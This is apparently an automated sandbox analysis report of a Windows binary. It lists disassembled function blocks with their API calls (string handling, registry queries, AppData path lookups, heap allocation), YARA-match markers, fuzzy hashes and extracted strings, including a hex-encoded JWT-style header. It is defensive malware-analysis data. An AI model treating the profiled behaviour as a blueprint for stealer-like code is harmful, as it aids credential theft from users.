                              • Opcode Fuzzy Hash: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                              • Instruction Fuzzy Hash: 26413075A1050DAFCB55EF64EC86FEE77B8EB54304F004064B50A9B251EE34AA898F91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A7F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A7F60
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FA5
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FD3
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8007
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 18c897202ac84731af07e6a1940b2812ff75da816248aaf7b45ccbaf17dd3014
                              • Instruction ID: df767bf35ae0821506c0d1cec216e7f8486e63608d1599d1a491a8b68f585c89
                              • Opcode Fuzzy Hash: 18c897202ac84731af07e6a1940b2812ff75da816248aaf7b45ccbaf17dd3014
                              • Instruction Fuzzy Hash: 9C41803060411AEFCB22DF68D8C4EAEB7B8FF55300F124599E805DB351EB74AA65CB91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A80BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A80EA
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8102
                              • lstrlen.KERNEL32(00000000), ref: 003A8140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A816F
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 191433ec5b19498a57a93009ec48cf027e23011eb2fb4905c4d8428acd3c5794
                              • Instruction ID: 74276d05ab93b536494d374efa8f3ec8cf1642bd1a8d080f1b7855371b280232
                              • Opcode Fuzzy Hash: 191433ec5b19498a57a93009ec48cf027e23011eb2fb4905c4d8428acd3c5794
                              • Instruction Fuzzy Hash: 6E419E71A00206AFCB22DF78D948BAABBF4EF45700F11845CA845D7204EF34DD46CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B3166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B316D
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1B798,00000000,00020119,?), ref: 003B318C
                              • RegQueryValueExA.ADVAPI32(?,00F2E238,00000000,00000000,00000000,000000FF), ref: 003B31A7
                              • RegCloseKey.ADVAPI32(?), ref: 003B31B1
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                              • Instruction ID: 528c10d76618b775ecabde3c84b083704843bc1e847fa26107dc661d3d92c56b
                              • Opcode Fuzzy Hash: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                              • Instruction Fuzzy Hash: 05115176A40615AFD710DF98DC49FBBBBBCF748B11F00426AFA09E3680DB7559048BA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 4de640f0727839386bdb1d22563731d073ce99324657db81aa83c4006858db92
                              • Instruction ID: e6b606df5c446ab82a36ded71b159c1008d326fcceae2263c9edab0a764a4497
                              • Opcode Fuzzy Hash: 4de640f0727839386bdb1d22563731d073ce99324657db81aa83c4006858db92
                              • Instruction Fuzzy Hash: 6B41097150475CAEDB338B28CD85FFB7BFC9B45308F1448E9EB868A582D2719A459F20
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 003989CD
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                              • Instruction ID: 652ae8bb307b514e51775ff6737a05bd93ba009e20aa596758c463df1496447f
                              • Opcode Fuzzy Hash: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                              • Instruction Fuzzy Hash: A421A6723006505BCF229B5CE840A6AF799DBE2761B15093FF152CB641DB71DC41C3A5
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398883
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                              • Instruction ID: acf9543cb6b77b2da0464b064a02adf5d3e1efbba48625676f6e4ab8ae157c53
                              • Opcode Fuzzy Hash: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                              • Instruction Fuzzy Hash: 013186B5E005159BCB09DF58C8916AEBBB6EBC9350F148269E915DF344DB30AD01CB91
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5922
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5935
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                              • Instruction ID: de5b9a4e67ba1fd253120108cb07cda56cf3944150be46834906f7d380505236
                              • Opcode Fuzzy Hash: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                              • Instruction Fuzzy Hash: 70117030318B40CBD7338F2CE800B99B7E1ABD1765F250A5DE1D1CBA95CB61D841C7A1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003BA430,000000FF), ref: 003B3D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B3D27
                              • wsprintfA.USER32 ref: 003B3D37
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                              • Instruction ID: 55c8b65989e9512484d62ff8a4b292d72506d2bd8c27739f1b8ec383a3d3ceb8
                              • Opcode Fuzzy Hash: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                              • Instruction Fuzzy Hash: EC01C071640B14BFE7105B54DC0EFAABB6CFB55B61F000115FA05E76D0DBB42904CAA6
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00398737
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                              • Instruction ID: 147508ae3cf101fd7e86a4273ce5e46083873b1a1fc580d55aab9220d8d707fe
                              • Opcode Fuzzy Hash: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                              • Instruction Fuzzy Hash: C7F02437F000210F8706657D8C8049EA80756E239033AC725E80AEF359DC30EC8281D5
                              APIs
                                • Part of subcall function 003B781C: __mtinitlocknum.LIBCMT ref: 003B7832
                                • Part of subcall function 003B781C: __amsg_exit.LIBCMT ref: 003B783E
                              • ___addlocaleref.LIBCMT ref: 003B8756
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu<$xt<
                              • API String ID: 3105635775-4126764381
                              • Opcode ID: 194ac4c29edd3183c7d35dff54aab1462d33215d2076ae87be6736e20494f4d3
                              • Instruction ID: 6e0ee922d17121832212ba1f3967e5918ed2f9d29b394c9113a6475ea52bf78e
                              • Opcode Fuzzy Hash: 194ac4c29edd3183c7d35dff54aab1462d33215d2076ae87be6736e20494f4d3
                              • Instruction Fuzzy Hash: CB01C475545700DAD722AF79C806B89F7E0EF4131CF20990DE6D69BAE0CFB0AA45CB10
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE544
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE573
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE581
                              • lstrcat.KERNEL32(?,00F2E458), ref: 003AE59C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                              • Instruction ID: b6afa45ea108bb0932386ebe0ade823aadbb64ec622d2b997562a3695133e86e
                              • Opcode Fuzzy Hash: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                              • Instruction Fuzzy Hash: FD51B576A10518AFCB56EB64DC42EFE337DEB58300F044498FA069B241EE70AE458BA0
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003B1FDF, 003B1FF5, 003B20B7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                              • Instruction ID: 9cd6ce351d5159f8c2aa8fae8036f6d0dbfc5210f7352259ff4a18d3748d7b6a
                              • Opcode Fuzzy Hash: 984f2f61aee62bd421f2b2854f3c9e1303d976ffe7db8aec22b12db6bc4cec34
                              • Instruction Fuzzy Hash: 34218E355102898FD722FB35C8547DFF3A7DF80369F85425ACA184BA41E336090AD796
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 003AEBF1
                              • lstrcat.KERNEL32(?,00F2F3E8), ref: 003AEC0C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                              • Instruction ID: d2e225385208428da1226ee1b91a698941a32008c27e09fbdcedf7ecf6d3a702
                              • Opcode Fuzzy Hash: 04c82b10dc0d2fc02d74f1859ef8627311e8632b6c13778a0cc913c852097e62
                              • Instruction Fuzzy Hash: 89319572A11519AFCF26EF64DC46FEE73B4FF58300F1104A8BA06AB240DE309E548B94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003BA3D0,000000FF), ref: 003B2B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003B2B96
                              • GetLocalTime.KERNEL32(?,?,00000000,003BA3D0,000000FF), ref: 003B2BA2
